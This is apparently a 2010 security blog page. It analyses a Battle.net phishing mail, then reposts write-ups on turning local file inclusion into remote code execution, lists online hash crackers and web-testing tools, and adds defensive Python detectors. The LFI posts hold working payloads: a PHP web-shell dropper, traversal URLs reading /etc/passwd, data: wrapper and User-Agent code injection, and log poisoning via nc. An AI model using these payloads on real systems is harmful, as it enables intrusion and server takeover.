new bnet fake mail
by admin on Nov.30, 2010, under security, Uvahy
With Christmas approaching, a new wave of WoW fake mails has arrived, and they look good enough to succeed.
It shocked me last night, since I viewed the text version on my phone, without the link or the full header.
The mail consists of both a text and an HTML part.
In text it looks fine:
but the HTML version of course contains a link to a malicious website (marked red):
hxxp://www.battle.net-securelogin-management.com/login/en/login.asp?ref=https%3A%2F%2Fus.battle.net%2Faccount%2Fmanagement%2Fbeta-profile.xml&app=bam
www.battle.net-securelogin-management.com has address 200.63.44.35
Host 35.44.63.200.in-addr.arpa. not found: 3(NXDOMAIN)
17 172 ms 187 ms 196 ms so-3-0-2.usa.pan-pob-edge02.columbus-networks.com [63.245.5.145]
18 211 ms 209 ms 208 ms ge-2-0-0.usa.pan-pob-edge01.columbus-networks.com [63.245.5.149]
19 210 ms 208 ms 208 ms PANAMASE-38D28A [190.242.68.130]
20 207 ms 208 ms 208 ms 200.63.44.35
Welcome to Panama =]
http://whois.arin.net/rest/net/NET-200-0-0-0-1
Domain registration info... hmm, registered 26.11.2010, looking very “trustworthy”...
Domain Name: NET-SECURELOGIN-MANAGEMENT.COM
Registrar: HICHINA ZHICHENG TECHNOLOGY LTD.
Whois Server: grs.hichina.com
Referral URL: http://www.net.cn
Name Server: DNS23.HICHINA.COM
Name Server: DNS24.HICHINA.COM
Status: ok
Updated Date: 26-nov-2010
Creation Date: 26-nov-2010
Expiration Date: 26-nov-2011
Registrars.Domain Name ..................... net-securelogin-management.com
Name Server ..................... dns23.hichina.com
dns24.hichina.com
Registrant ID ................... hc061023234-cn
Registrant Name ................. wu an
Registrant Organization ......... wu an bo
Registrant Address .............. henansheng zhengzhoushi
Registrant City ................. zhengzhou
Registrant Province/State ....... HA
Registrant Postal Code .......... 530012
Registrant Country Code ......... CN
Registrant Phone Number ......... +86.037165862108 -
Registrant Fax .................. +86.037165862108 -
Registrant Email ................ mmm123456789@qq.com
Administrative ID ............... hc061023234-cn
Administrative Name ............. wu an
Administrative Organization ..... wu an bo
Administrative Address .......... henansheng zhengzhoushi
Administrative City ............. zhengzhou
Administrative Province/State ... HA
Administrative Postal Code ...... 530012
Administrative Country Code ..... CN
Administrative Phone Number ..... +86.037165862108 -
Administrative Fax .............. +86.037165862108 -
Administrative Email ............ mmm123456789@qq.com
Billing ID ...................... hc061023234-cn
Billing Name .................... wu an
Billing Organization ............ wu an bo
Billing Address ................. henansheng zhengzhoushi
Billing City .................... zhengzhou
Billing Province/State .......... HA
Billing Postal Code ............. 530012
Billing Country Code ............ CN
Billing Phone Number ............ +86.037165862108 -
Billing Fax ..................... +86.037165862108 -
Billing Email ................... mmm123456789@qq.com
Technical ID .................... hc061023234-cn
Technical Name .................. wu an
Technical Organization .......... wu an bo
Technical Address ............... henansheng zhengzhoushi
Technical City .................. zhengzhou
Technical Province/State ........ HA
Technical Postal Code ........... 530012
Technical Country Code .......... CN
Technical Phone Number .......... +86.037165862108 -
Technical Fax ................... +86.037165862108 -
Technical Email ................. mmm123456789@qq.com
Expiration Date ................. 2011-11-26 11:22:22
Mail header:
Return-Path: wcp.com>
Delivered-To:
Received: from localhost (localhost [127.0.0.1])
by hades.hell.sk (Postfix) with ESMTP id 6A9DD22A6
for <>; Sun, 28 Nov 2010 07:37:34 +0100 (CET)
X-Virus-Scanned: Debian amavisd-new at hades.hell.sk
Received: from hades.hell.sk ([127.0.0.1])
by localhost (hades.hell.sk [127.0.0.1]) (amavisd-new, port 10024)
with ESMTP id F-GyfDyCczp6 for ;
Sun, 28 Nov 2010 07:37:33 +0100 (CET)
Received: from wcp.com (213-132-178-164.multikabel.nl [213.132.178.164])
by hades.hell.sk (Postfix) with ESMTP id 687B822A3
for <>; Sun, 28 Nov 2010 07:37:30 +0100 (CET)
Reply-To:
Message-ID: <7EA52D8C342BF823B870791BBCEDBC16@wcp.com>
From: "noreply@blizzard.com"
To: <>
Subject: Battle.net Account - Account Change Notice
Date: Sun, 28 Nov 2010 14:37:41 +0800
MIME-Version: 1.0
Content-Type: multipart/alternative;
boundary="----=_NextPart_000_059D_0120B3AA.103DB080"
X-Priority: 3
X-MSMail-Priority: Normal
X-Mailer: Microsoft Outlook Express 6.00.2900.5512
X-MimeOLE: Produced By Microsoft MimeOLE V6.00.2900.5512
Please NEVER click on links in e-mails! =]
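The checks the post does by hand (where the link really points, who actually handed the mail in) can be scripted. The following is an added example, not code from this blog: it parses the headers quoted above (the recipient fields the post strips are filled with a placeholder) and the phishing URL, reduces every hostname to its registrable domain, and reports what does not line up with the brand the mail claims to come from. The tiny public-suffix set and the `registrable_domain` helper are my assumptions; real code should load the full public suffix list.

```python
import email
import re
from urllib.parse import parse_qs, urlparse

# Constructed from the headers quoted above: the stripped recipient fields get a
# placeholder, the From line stays exactly as the post shows it (display name only).
RAW_HEADERS = """\
Received: from localhost (localhost [127.0.0.1])
    by hades.hell.sk (Postfix) with ESMTP id 6A9DD22A6
    for <victim@example.invalid>; Sun, 28 Nov 2010 07:37:34 +0100 (CET)
Received: from hades.hell.sk ([127.0.0.1])
    by localhost (hades.hell.sk [127.0.0.1]) (amavisd-new, port 10024)
    with ESMTP id F-GyfDyCczp6 for <victim@example.invalid>;
    Sun, 28 Nov 2010 07:37:33 +0100 (CET)
Received: from wcp.com (213-132-178-164.multikabel.nl [213.132.178.164])
    by hades.hell.sk (Postfix) with ESMTP id 687B822A3
    for <victim@example.invalid>; Sun, 28 Nov 2010 07:37:30 +0100 (CET)
Message-ID: <7EA52D8C342BF823B870791BBCEDBC16@wcp.com>
From: "noreply@blizzard.com"
To: <victim@example.invalid>
Subject: Battle.net Account - Account Change Notice
Date: Sun, 28 Nov 2010 14:37:41 +0800

"""

# The link from the HTML part (the post defangs it as hxxp; restored so urlparse accepts it).
PHISH_URL = ("http://www.battle.net-securelogin-management.com/login/en/login.asp"
             "?ref=https%3A%2F%2Fus.battle.net%2Faccount%2Fmanagement%2Fbeta-profile.xml&app=bam")

BRAND_DOMAINS = {"battle.net", "blizzard.com"}  # what the mail claims to be

# Assumption: a tiny stand-in for the public suffix list, enough for this example only.
PUBLIC_SUFFIXES = {"com", "net", "nl", "sk", "cn", "invalid"}


def registrable_domain(host):
    """Public suffix plus one label: 'www.battle.net-x.com' -> 'net-x.com', 'us.battle.net' -> 'battle.net'."""
    labels = host.lower().rstrip(".").split(".")
    suffix_len = 1
    for n in range(1, len(labels)):
        if ".".join(labels[-n:]) in PUBLIC_SUFFIXES:
            suffix_len = n
    if len(labels) <= suffix_len:
        return ".".join(labels)
    return ".".join(labels[-(suffix_len + 1):])


def link_findings(url):
    """Where a link really goes, and whether a brand domain only appears as a decoy parameter."""
    parsed = urlparse(url)
    host = parsed.hostname or ""
    decoys = []
    for values in parse_qs(parsed.query).values():  # parse_qs already percent-decodes
        for v in values:
            if v.startswith(("http://", "https://")):
                decoys.append(registrable_domain(urlparse(v).hostname or ""))
    reg = registrable_domain(host)
    return {"host": host, "registrable": reg, "brand_match": reg in BRAND_DOMAINS,
            "brand_domains_in_params": [d for d in decoys if d in BRAND_DOMAINS]}


RECEIVED_RE = re.compile(r"from\s+(\S+)\s+\(([^\s\[\]]*)\s*\[([\d.]+)\]\)")


def first_external_hop(msg, local_ips=("127.0.0.1",)):
    """Received headers are newest-first, so the first non-local one is the host that handed the mail in."""
    for header in msg.get_all("Received", []):
        m = RECEIVED_RE.search(" ".join(header.split()))  # unfold the header first
        if m and m.group(3) not in local_ips:
            return {"helo": m.group(1), "rdns": m.group(2), "ip": m.group(3)}
    return None


def analyze(raw_headers, urls):
    """Facts extracted from the mail plus a list of human-readable findings."""
    msg = email.message_from_string(raw_headers)
    from_domains = sorted(set(re.findall(r"@([A-Za-z0-9.-]+)", msg.get("From", ""))))
    m = re.search(r"@([^>\s]+)>", msg.get("Message-ID", ""))
    msgid_domain = m.group(1) if m else ""
    hop = first_external_hop(msg)
    findings = []
    if hop:
        sender = {registrable_domain(hop["helo"]), registrable_domain(hop["rdns"])}
        if not sender & set(from_domains):
            findings.append("handed in by %s (%s, %s), which is not a From domain %s"
                            % (hop["ip"], hop["helo"], hop["rdns"], from_domains))
    if msgid_domain and registrable_domain(msgid_domain) not in from_domains:
        findings.append("Message-ID domain %s differs from From domain(s) %s" % (msgid_domain, from_domains))
    links = [link_findings(u) for u in urls]
    for link in links:
        if not link["brand_match"]:
            findings.append("link host %s registers as %s, not a brand domain" % (link["host"], link["registrable"]))
        if link["brand_domains_in_params"]:
            findings.append("brand domain %s appears only inside a query parameter of %s"
                            % (link["brand_domains_in_params"], link["host"]))
    return {"from_domains": from_domains, "msgid_domain": msgid_domain, "hop": hop,
            "links": links, "findings": findings}


if __name__ == "__main__":
    for finding in analyze(RAW_HEADERS, [PHISH_URL])["findings"]:
        print("-", finding)
```

Run stand-alone it prints four findings: the host that handed the mail in (wcp.com on a multikabel.nl address) and the Message-ID domain are not blizzard.com, the link registers as net-securelogin-management.com rather than battle.net, and the only battle.net in the URL sits inside the ref= parameter, which is precisely the part a phone's text view hides.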
successfully migrated to hades
by dominee on Mar.23, 2010, under Uvahy
Yeah.. migration process continues well.. wp successfully migrated to hades! =]
(repost) Micro PHP LFI Backdoor
by dominee on Jan.29, 2010, under security
I’ve been playing around a lot more with LFI attacks, because I think they’re more prevalent than I originally had expected. Last night I had cigars with one of the OWASP guys and I got to thinking that I should probably do a quick post about this. For those who aren’t clued in about LFI (local file include) attacks, it basically means that PHP is pulling in a file locally and running it (you see that happen a lot with flags like language=en where en represents a file called en.php). So an attack might look like:
http://www.example.com/index.php?language=../../../../../../etc/passwd%00
The null byte is to truncate anything at the end that the php file might be trying to append to the end of the file, like “.php” in “en.php” and so on. Although in that example password files aren’t PHP so it’s not helping you much beyond being able to read files off the file system. So the next step is finding the log files and injecting a PHP backdoor through a user agent or referring URL. There are some problems with this depending on how you do it because Apache logs will escape quotes. Assuming you find a way around that (like using the error logs rather than the access logs) you can inject your PHP backdoor. Here’s my micro backdoor (thanks to Daniel Herrera for inspiration):
<?php $c=fopen('/tmp/g','w');fwrite($c,'<?php passthru($_GET["f"]);?>');?>
So now what this does is throw a PHP file into the /tmp directory (which is typically writable). More importantly that file can now be used to inject commands directly (in the example below it’s executing whoami):
http://www.example.com/index.php?language=../../../../../../tmp/g%00&f=whoami
If anyone has shorter/more effective LFI backdoor, please let me know and I’ll post them.
from comments:
I have a pretty effective LFI backdoor which won’t require any file loading at all!
Taking advantage of PHP’s RFC 2397 support (http://php.net/manual/en/wrappers.data.php), you can inject the PHP code you want executed directly into the URL. With that said, using your above example:
http://www.example.com/index.php?language=data:,?&cmd=whoami
I’ve tested it out using several methods, including the support for base64 encoding:
http://www.example.com/index.php?language=data:;base64,PD8gZXhlYygkX0dFVFtjbWRdKTsgPz4=&cmd=whoami
Using the base64 encoding, you may be able to shorten your injection pending that they have size restrictions.
Also notice above, when using $_GET[cmd], there aren’t any quotes used. This still works effectively and it comes in handy if the server has magic_quotes enabled.
source: http://ha.ckers.org/blog/20100128/micro-php-lfi-backdoor/
(repost) LFI2RCE (Local File Inclusion to Remote Code Execution) advanced exploitation: /proc shortcuts
by dominee on Jan.29, 2010, under security
This paper exposes the ability from the attacker standpoint to use /proc in order to exploit LFI (Local File Inclusion) vulnerabilities. While using /proc for such an aim is well known, this one is a specific technique that has not been previously published as far as we know. A tool to automatically exploit LFI using the shown approach is released accordingly.
Update: a third (known) technique has been dissected here: http://www.ush.it/2008/07/09/local-file-inclusion-lfi-of-session-files-to-root-escalation/
LFI2RCE advanced exploitation: /proc shortcuts
On UNIX systems, especially on Linux, /proc is the preferred userspace interface used for a number of things, especially process information. This article will expose a technique that uses /proc/%{PID}/fd/%{FD_ID} to implicitly find the location of the logfile containing the attacker’s payload. Enjoy reading this article by kuza55 and ascii (-;
It’s known that LFI (Local File Inclusion) vulnerabilities can be exploited in a way that converts them into RCE (Remote Code Execution). The malicious payload must exist locally, on the filesystem, but since the attacker is commonly not able to directly upload/create a file, logs are used. By their intrinsic nature logfiles contain data that is driven by users (e.g. the log will contain user inputs of some sort). Logfiles that don’t present this behaviour are not valid candidates.
The trick is to make these logs contain a base payload that will be later interpreted and executed when the logfile is included. This technique itself has been known for many years (milw0rm.com/exploits/34 is dated 2003-05-29 but it’s even older).
On a UNIX system multiple logfiles can be used for this purpose: xfer log (“Transfer log”) using specially crafted filenames during FTP transfers, fail.log using a crafted username and performing a failed login on the FTP server, etc.
While the path of these files is almost always known (they stay in /var/ with weak permissions, masked 022) the service might not be present or reachable from outside (think of an IP that exposes only https?). For this reason access_log and error_log are the most used to perform this type of attack, since it’s self-contained (uses only resources provided by the webserver, a component that is hardly missing in this scenario!).
If needed, let a few commands make things even clearer:
# echo -en "USER evil_payload\nPASS secr3t\n\n" | nc localhost 21
220 (vsFTPd 1.2.3)
331 Please specify the password.
530 Login incorrect.
530 Please login with USER and PASS.
$ cat /var/log/vsftpd.log
Thu Jul 10 02:33:22 2008 [pid 27931] CONNECT: Client "127.0.0.1"
Thu Jul 10 02:33:24 2008 [pid 27930] [evil_payload] FAIL LOGIN: Client "127.0.0.1"
$ curl "http://localhost/index.php?page=../../../var/log/vsftpd.log%00"
Note1: This general concept is often applied to PHP applications but is also valid in other environments.
Note2: On Windows the story is similar and LFI2RCE conversions still apply, but obviously not the specific /proc technique presented.
To overcome the need to know the location of (access|error)_log (it could be guessable by bruteforcing against a list of known locations or obtained from configuration files) it’s possible to directly access it by its file descriptor entry in /proc (a symlink to the real location).
Warning! Achtung! Attenzione! This means that the proposed technique can’t bypass any filesystem ACL. It won’t magically exploit the target. The “injected” logfile must be readable by the interpreter as in any normal LFI (for example it won’t work on Debian default vhost logs since they are readable only by root).
Including /proc/31508/fd/5 the lstat64() and readlink() magic will drive directly to the obscure and hard to guess location of access_log (/home/www.example.com/private/.rawlogs/access.log in this example).
In this attack the only variables are the process ID of a disposable apache thread/mod_* and the file descriptor number (with the first three reserved for stdin, stdout and stderr). As said before the process ID must be the one of some application with an open file descriptor to the target, and Apache satisfies this requirement; this means that in case of mod_* it’s possible to directly use /proc/self since interpreter execution happens inside Apache. When CGIs are used it’s possible to go back up to the Apache PID by reading the 4th column of /proc/self/stat (if necessary iterate). Since mod_php is the common case /proc/self is normally enough to carry out a successful attack, which makes the process unaffected by the presence of, for example, Grsec’s user-only /proc.
The second variable was the file descriptor number, which greatly depends on the target setup and load since file descriptors can belong to a range of resources like pipes, sockets and naturally files. Some of the fds point to logfiles and only two of them are the ones of the target vhost. At the moment of writing we are unaware of methods to directly guess the right number, but the tool attached to this document speeds up the process and automatically gives hints on the logfile type and usage. Note that fds to logfiles are the first opened by Apache and this is especially true for non-threaded MPMs like prefork. In such a condition the right fd number mainly depends on the number of vhosts loaded before the one containing the vulnerable application under attack.
As the final attack the right /proc/self/fd/X will be included and the injected payload executed.
While writing this article and trying to give complete and accurate information a paper came to our attention: “LOCAL FILE INCLUSIONS by G-Brain” (http://www.g-brain.net/tutorials/local-file-inclusions.txt). It exposes a similar and possibly better technique we were not aware of that is self-contained (doesn’t require two different stages, one to inject the payload in the log and one to actually include the logfile) and non-resilient (doesn’t leave any payload in logs).
Summarizing, /proc/self/environ contains user inputs (like an env var named HTTP_USER_AGENT containing the data specified in the User-Agent request header) that turn it into a useful volatile storage for LFI2RCE attacks. It also contains other user controlled data beyond UA.
curl "http://example.com/index.php?page=../../../proc/self/environ&cmd=ls"
-H "User-Agent: PHP_RCE: <?php passthru(\$_GET['cmd']) ?>"
The greatest advantage of this attack is that the whole path is static and known; on the other hand I had no luck in making it work on most of my machines (Failed to open stream: Permission denied).
Now that you know the details of /proc LFI exploitation it’s time to explain the disadvantages related to /proc and the setups in which the exposed techniques will not work.
Logfiles owned by root and readable only by root: this is the vanilla setup (at least for Gentoo and Debian) for the default vhost. Experience teaches us that additional vhosts are often configured manually and differently. This is possible since the fd’s are opened before dropping privileges.
Safe mode/open_basedir: if open_basedir is correctly configured /proc is no longer accessible; on the other hand logfiles could reside in an allowed path (ex: open_basedir=/home, access_log at /home/www.example.com/logs/www_access.log). Note that mass vhosters clone a “skeleton” when creating new users, so the path to logfiles could also be guessed by subscribing to the service.
Chroot without proc: the interpreter could run inside a chroot; in this case /proc could be nonexistent or the files linked by proc unreachable.
Grsec user-only /proc plus CGI setup: if the interpreter process belongs to a specific user that is different from the one running Apache it will be impossible to access /proc/apache_pid/*.
Theoretical details are over, time for the code! To demonstrate our technique (LFI2RCE using /proc/self/fd) this demo tool has been coded. It’s in bash; if that disgusts you feel free to convert it into your favorite language (-;
The tool:
http://ush.it/team/ascii/hack-lfi2rce_proc/lfi2rce.sh
A nice demo for the impatient:
http://ush.it/team/ascii/hack-lfi2rce_proc/lfi2rce.demo.txt
* http://www.g-brain.net/tutorials/local-file-inclusions.txt
Last-Modified: Mon, 24 Mar 2008 12:52:49 GMT
A text version of the above article can be found here: http://ush.it/team/ascii/hack-lfi2rce_proc/lfi2rce.txt
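Both LFI posts above inject the payload through request data that ends up in the web server's own log, which means that same log is where a defender can spot the attempt. The detector below is an added example, not code from ush.it or ha.ckers.org: it runs over constructed Apache combined-format lines that replay the requests shown above (traversal with a %00 terminator, the data: wrapper with a base64 body, and the /proc/self/environ and /proc/self/fd includes with the PHP tag in the User-Agent) and tags each line with the indicators it matches. The indicator names and regexes are my own.

```python
import base64
import re
from urllib.parse import unquote, urlsplit

# Constructed sample in Apache "combined" format: the requests from the two LFI posts
# above as a webserver would log them, plus one benign request as a control.
SAMPLE_LOG = """\
10.0.0.5 - - [29/Jan/2010:10:12:01 +0100] "GET /index.php?language=../../../../../../etc/passwd%00 HTTP/1.1" 200 512 "-" "Mozilla/5.0"
10.0.0.5 - - [29/Jan/2010:10:12:09 +0100] "GET /index.php?language=../../../../../../tmp/g%00&f=whoami HTTP/1.1" 200 88 "-" "Mozilla/5.0"
10.0.0.6 - - [29/Jan/2010:10:13:40 +0100] "GET /index.php?language=data:;base64,PD8gZXhlYygkX0dFVFtjbWRdKTsgPz4=&cmd=whoami HTTP/1.1" 200 88 "-" "Mozilla/5.0"
10.0.0.7 - - [29/Jan/2010:10:15:02 +0100] "GET /index.php?page=../../../proc/self/environ&cmd=ls HTTP/1.1" 200 2048 "-" "PHP_RCE: <?php passthru($_GET['cmd']) ?>"
10.0.0.7 - - [29/Jan/2010:10:15:30 +0100] "GET /index.php?page=../../../proc/self/fd/5 HTTP/1.1" 200 4096 "-" "Mozilla/5.0"
192.0.2.10 - - [29/Jan/2010:10:16:00 +0100] "GET /index.php?language=en HTTP/1.1" 200 1024 "-" "Mozilla/5.0"
"""

# Apache combined format; quoted fields may contain backslash-escaped quotes.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d{3}) \S+ '
    r'"(?P<referer>(?:[^"\\]|\\.)*)" "(?P<ua>(?:[^"\\]|\\.)*)"$'
)

# Each indicator is checked against the decoded request target, the Referer, the
# User-Agent and any decoded data: payload found in a parameter value.
INDICATORS = {
    "traversal":      re.compile(r"\.\./"),
    "null_byte":      re.compile(r"\x00"),
    "proc_fs":        re.compile(r"/proc/(?:self|\d+)/(?:environ|fd/\d+|stat)"),
    "sensitive_file": re.compile(r"/etc/(?:passwd|shadow)"),
    "php_tag":        re.compile(r"<\?(?:php\b|=|\s)", re.IGNORECASE),
}


def query_values(raw_target):
    """Decoded parameter values of a logged request target (split on '&' only, so ';' in data: survives)."""
    query = urlsplit(raw_target).query
    return [unquote(part.partition("=")[2]) for part in query.split("&") if part]


def decode_data_uri(value):
    """Return the payload of an RFC 2397 data: URI, or None if value is not one."""
    m = re.match(r"data:(?P<meta>[^,]*),(?P<body>.*)", value, re.DOTALL)
    if not m:
        return None
    body = m.group("body")
    if not m.group("meta").endswith(";base64"):
        return body
    try:
        return base64.b64decode(body + "=" * (-len(body) % 4)).decode("latin-1")
    except ValueError:  # binascii.Error is a ValueError; keep the raw body for inspection
        return body


def inspect_line(line):
    """Classify one log line; returns a hit dict or None when nothing suspicious is seen."""
    m = LOG_RE.match(line)
    if not m:
        return None
    texts = {
        "target": unquote(m.group("target")),  # %00 -> NUL, %2e%2e%2f -> ../
        "referer": m.group("referer"),
        "ua": m.group("ua"),
    }
    for value in query_values(m.group("target")):
        payload = decode_data_uri(value)
        if payload is not None:
            texts["data_uri"] = payload
    names = {name for name, rx in INDICATORS.items()
             for text in texts.values() if rx.search(text)}
    if "data_uri" in texts:
        names.add("data_wrapper")
    if not names:
        return None
    return {"ip": m.group("ip"), "time": m.group("ts"),
            "target": m.group("target"), "indicators": sorted(names)}


def scan(log_text):
    """Run inspect_line over a whole log and keep only the hits."""
    return [hit for hit in map(inspect_line, log_text.splitlines()) if hit]


if __name__ == "__main__":
    for hit in scan(SAMPLE_LOG):
        print(hit["ip"], hit["time"], ", ".join(hit["indicators"]), hit["target"])
```

The data: payload is base64-decoded before matching, so the PHP tag hidden in the base64 variant is reported just like the plain one, and matching on the percent-decoded target catches traversal that the raw line would hide. Treat hits like these as a trigger for the mitigations the article lists (logs readable only by root, open_basedir that excludes /proc) rather than as a substitute for them.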
Various Online Password Crackers (carnal0wnage)
by dominee on Jan.12, 2010, under security
Just a list of online (mostly) md5 crackers, but some do others.
This post over on pcsec got me thinking about them.
http://www.pcsec.org/archives/MD5Seacrh-v18-by-mass.html
Of course not all of those are working, at least not for me.
So here is that list with links and a few others, thanks to my twitter homies.
passcracking.ru http://passcracking.ru/
md5crack http://md5crack.com/
md5decryption: http://md5decryption.com/
TheKaine.de: http://md5.thekaine.de/
AuthSecu: http://authsecu.com/decrypter-dechiffrer-cracker-hash-md5/decrypter-dechiffrer-cracker-hash-md5.php
hackcrack: http://hashcrack.com/index.php
insidepro: http://hash.insidepro.com/
md5decrypter: http://md5decrypter.com/
md5pass.info: http://md5pass.info/
Bonus points for two of the sites from the screen shot just giving you a parallels plesk login.
Sites specifically mentioned to me in no particular order
Plain-Text.info http://plain-text.info/add/ (also has IRC support)
Hashkiller: http://hashkiller.com/password/
Cryptohaze: http://www.cryptohaze.com/addhashes.php
md5rednoize: http://md5.rednoize.com/
milw0rm: http://milw0rm.com/cracker/insert.php
GData: http://gdataonline.com/seekhash.php
c0llision: http://www.c0llision.net/webcrack.php (also has IRC support)
ISC: http://isc.sans.org/tools/reversehash.html
PassCracking http://passcracking.com/
Lastly, for fun, a metasploit module that submits the hash to md5crack.com and displays the password if it’s found.
msf auxiliary(md5check_md5crack) > run
[*] Sending 098f6bcd4621d373cade4e832627b4f6 hash to md5crack.com…
[*] plaintext md5 is: test
[*] Auxiliary module execution completed
I started to do more than just md5crack but writing regexes for different sites just seemed like a waste of time.
http://carnal0wnage.attackresearch.com/sites/default/files/md5check_md5c… (rename to .rb)
repost from: http://carnal0wnage.attackresearch.com/node/402
sqli webgames and tools (owasp repost)
by dominee on Jan.04, 2010, under security
LiveCDs
OWASP LiveCD (AOC_Labrat-ALPHA-0010.iso, January 29, 2007) – http://www.packetfocus.com/hackos/
DVL (Damn Vulnerable Linux) – http://www.damnvulnerablelinux.org/
Test sites / testing grounds
SPI Dynamics (live) – http://zero.webappsecurity.com/
Cenzic (live) – http://crackme.cenzic.com/
Watchfire (live) – http://demo.testfire.net/
Acunetix (live) – http://testphp.acunetix.com/ http://testasp.acunetix.com http://testaspnet.acunetix.com
WebMaven / Buggy Bank – http://www.mavensecurity.com/webmaven
Foundstone SASS tools – http://www.foundstone.com/us/resources-free-tools.asp
Updated HacmeBank – http://www.o2-ounceopen.com/technical-info/2008/12/8/updated-version-of-hacmebank.html
OWASP WebGoat – http://www.owasp.org/index.php/OWASP_WebGoat_Project
OWASP SiteGenerator – http://www.owasp.org/index.php/Owasp_SiteGenerator
Stanford SecuriBench – http://suif.stanford.edu/~livshits/securibench/
SecuriBench Micro – http://suif.stanford.edu/~livshits/work/securibench-micro/
HTTP proxying / editing
WebScarab – http://www.owasp.org/index.php/Category:OWASP_WebScarab_Project
Burp – http://www.portswigger.net/
Paros – http://www.parosproxy.org/
Fiddler – http://www.fiddlertool.com/
Web Proxy Editor – http://www.microsoft.com/mspress/companion/0-7356-2187-X/
Pantera – http://www.owasp.org/index.php/Category:OWASP_Pantera_Web_Assessment_Studio_Project
Suru – http://www.sensepost.com/research/suru/
httpedit (curses-based) – http://www.neutralbit.com/en/rd/httpedit/
Charles – http://www.xk72.com/charles/
Odysseus – http://www.bindshell.net/tools/odysseus
Burp, Paros, and WebScarab for Mac OS X – http://www.corsaire.com/downloads/
Web-application scanning tool from `Network Security Tools’/O’Reilly – http://examples.oreilly.com/networkst/
JS Commander – http://jscmd.rubyforge.org/
Ratproxy – http://code.google.com/p/ratproxy/
RSnake’s XSS cheat sheet based-tools, webapp fuzzing, and encoding tools
Wfuzz – http://www.edge-security.com/wfuzz.php
ProxMon – http://www.isecpartners.com/proxmon.html
Wapiti – http://wapiti.sourceforge.net/
Grabber – http://rgaucher.info/beta/grabber/
XSSScan – http://darkcode.ath.cx/scanners/XSSscan.py
CAL9000 – http://www.owasp.org/index.php/Category:OWASP_CAL9000_Project
HTMangLe – http://www.fishnetsecurity.com/Tools/HTMangLe/publish.htm
JBroFuzz – http://sourceforge.net/projects/jbrofuzz
XSSFuzz – http://ha.ckers.org/blog/20060921/xssfuzz-released/
WhiteAcid’s XSS Assistant – http://www.whiteacid.org/greasemonkey/
Overlong UTF – http://www.microsoft.com/mspress/companion/0-7356-2187-X/
[TGZ] MielieTool (SensePost Research) – http://packetstormsecurity.org/UNIX/utilities/mielietools-v1.0.tgz
RegFuzzer: test your regular expression filter – http://rgaucher.info/b/index.php/post/2007/05/26/RegFuzzer%3A-Test-your-regular-expression-filter
screamingCobra – http://www.dachb0den.com/projects/screamingcobra.html
SPIKE and SPIKE Proxy – http://immunitysec.com/resources-freesoftware.shtml
RFuzz – http://rfuzz.rubyforge.org/
WebFuzz – http://www.codebreakers-journal.com/index.php?option=com_content&task=view&id=112&Itemid=99999999
TestMaker – http://www.pushtotest.com/Docs/downloads/features.html
ASP Auditor – http://michaeldaw.org/projects/asp-auditor-v2/
WSTool – http://wstool.sourceforge.net/
Web Hack Control Center (WHCC) – http://ussysadmin.com/whcc/
Web Text Converter – http://www.microsoft.com/mspress/companion/0-7356-2187-X/
HackBar (Firefox Add-on) – https://addons.mozilla.org/firefox/3899/
Net-Force Tools (NF-Tools, Firefox Add-on) – http://www.net-force.nl/library/downloads/
PostIntercepter (Greasemonkey script) – http://userscripts.org/scripts/show/743
HTTP general testing / fingerprinting
Wbox: HTTP testing tool – http://hping.org/wbox/
ht://Check – http://htcheck.sourceforge.net/
Mumsie – http://www.lurhq.com/tools/mumsie.html
WebInject – http://www.webinject.org/
Torture.pl Home Page – http://stein.cshl.org/~lstein/torture/
JoeDog’s Siege – http://www.joedog.org/JoeDog/Siege/
OPEN-LABS: metoscan (http method testing) – http://www.open-labs.org/
Load-balancing detector – http://ge.mine.nu/lbd.html
HMAP – http://ujeni.murkyroc.com/hmap/
Net-Square: httprint – http://net-square.com/httprint/
Wpoison: http stress testing – http://wpoison.sourceforge.net/
Net-square: MSNPawn – http://net-square.com/msnpawn/index.shtml
hcraft: HTTP Vuln Request Crafter – http://druid.caughq.org/projects/hcraft/
rfp.labs: LibWhisker – http://www.wiretrip.net/rfp/lw.asp
Nikto – http://www.cirt.net/code/nikto.shtml
twill – http://twill.idyll.org/
DirBuster – http://www.owasp.org/index.php/Category:OWASP_DirBuster_Project
[ZIP] DFF Scanner – http://security-net.biz/files/dff/DFF.zip
[ZIP] The Elza project – http://packetstormsecurity.org/web/elza-1.4.7-beta.zip http://www.stoev.org/elza.html
HackerFox and Hacking Addons Bundled: Portable Firefox with web hacking addons bundled – http://sf.net/projects/hackfox
Browser-based HTTP tampering / editing / replaying
TamperIE – http://www.bayden.com/Other/
isr-form – http://www.infobyte.com.ar/developments.html
Modify Headers (Firefox Add-on) – http://modifyheaders.mozdev.org/
Tamper Data (Firefox Add-on) – http://tamperdata.mozdev.org/
UrlParams (Firefox Add-on) – https://addons.mozilla.org/en-US/firefox/addon/1290/
TestGen4Web (Firefox Add-on) – https://addons.mozilla.org/en-US/firefox/addon/1385/
DOM Inspector / Inspect This (Firefox Add-on) – https://addons.mozilla.org/en-US/firefox/addon/1806/ https://addons.mozilla.org/en-US/firefox/addon/1913/
LiveHTTPHeaders / Header Monitor (Firefox Add-on) – http://livehttpheaders.mozdev.org/ https://addons.mozilla.org/en-US/firefox/addon/575/
Cookie editing / poisoning
[TGZ] stompy: session id tool – http://lcamtuf.coredump.cx/stompy.tgz
Add’N Edit Cookies (AnEC, Firefox Add-on) – http://addneditcookies.mozdev.org/
CookieCuller (Firefox Add-on) – http://cookieculler.mozdev.org/
CookiePie (Firefox Add-on) – http://www.nektra.com/oss/firefox/extensions/cookiepie/
CookieSpy – http://www.codeproject.com/shell/cookiespy.asp
Cookies Explorer – http://www.dutchduck.com/Features/Cookies.aspx
Ajax and XHR scanning
Sahi – http://sahi.co.in/
scRUBYt – http://scrubyt.org/
jQuery – http://jquery.com/
jquery-include – http://www.gnucitizen.org/projects/jquery-include
Sprajax – http://www.denimgroup.com/sprajax.html
Watir – http://wtr.rubyforge.org/
Watij – http://watij.com/
Watin – http://watin.sourceforge.net/
RBNarcissus – http://idontsmoke.co.uk/2005/rbnarcissus/
SpiderTest (Spider Fuzz plugin) – http://blog.caboo.se/articles/2007/2/21/the-fabulous-spider-fuzz-plugin
Javascript Inline Debugger (jasildbg) – http://jasildbg.googlepages.com/
Firebug Lite – http://www.getfirebug.com/lite.html
firewatir – http://code.google.com/p/firewatir/
RSS extensions and caching
LiveLines (Firefox Add-on) – https://addons.mozilla.org/en-US/firefox/addon/324/
